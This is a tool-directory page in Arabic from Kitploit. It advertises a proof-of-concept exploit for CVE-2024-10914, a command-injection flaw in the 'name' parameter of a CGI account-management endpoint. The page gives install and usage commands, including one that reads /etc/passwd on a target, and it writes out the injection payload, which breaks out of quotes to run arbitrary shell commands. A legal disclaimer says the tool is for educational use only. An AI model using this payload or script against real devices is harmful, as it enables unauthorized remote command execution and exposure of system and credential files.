Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10914__POC — إثبات المفهوم لاستغلال CVE-2024-10914 | Kitploit
أدوات/GitHubGitHub/0xss3k/cve-2024-10914__poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

إثبات المفهوم لاستغلال CVE-2024-10914

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10914 - إثبات المفهوم

استغلال لثغرة حقن الأوامر في نقطة الوصول /cgi-bin/account_mgr.cgi. تسمح هذه الثغرة بتنفيذ أوامر عشوائية على النظام المتأثر عبر معاملات غير معقمة.

وصف الثغرة

CVE-2024-10914 هي ثغرة حقن أوامر تؤثر على الأجهزة التي تحتوي على واجهة ويب CGI. التطبيق الثغري لا يتحقق بشكل صحيح من المعامل name في الطلب cgi_user_add، مما يسمح للمهاجم بحقن أوامر النظام التي سيتم تنفيذها بصلاحيات التطبيق.

المتطلبات

  • Python 3.7+
  • مكتبة requests

التثبيت

استنسخ المستودع وقم بتثبيت التبعيات:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

أو قم بالتثبيت يدويًا:

root@kitploit:~
pip install requests

الاستخدام

يوفر السكربت وسيطين:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

المعاملات

  • -u, --url (مطلوب): رابط الهدف (مثال: http://192.168.1.1)
  • -c, --command (اختياري): الأمر المراد تنفيذه (الافتراضي: id)

أمثلة

تنفيذ الأمر id:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

تنفيذ أمر مخصص:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

سرد الملفات:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

آلية العمل التقنية

يرسل الاستغلال طلب GET إلى نقطة الوصول الثغري مع الحمولة التالية:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

يتم إغلاق السلسلة الفارغة بعلامات اقتباس ويتم حقن الأمر المطلوب، والذي يتم تنفيذه في سياق الخادم.

الرد

سيعرض السكربت:

  • حالة الاتصال
  • الحمولة المرسلة
  • رمز حالة HTTP
  • الرد الكامل من الخادم

تحذير قانوني

يتم توفير هذا الكود فقط للأغراض التعليمية وأبحاث الأمان. يجب استخدامه فقط على الأنظمة التي لديك إذن صريح لاستخدامه عليها. قد يؤدي الاستخدام غير المصرح به لهذا الاستغلال إلى انتهاك القوانين المحلية ويشكل جريمة. المؤلف غير مسؤول عن سوء استخدام هذه الأداة.

المراجع

  • CVE-2024-10914
  • نقاط CVSS: يحدد لاحقًا

المؤلف

SS3K

الترخيص

غير محدد

تنزيل الأداة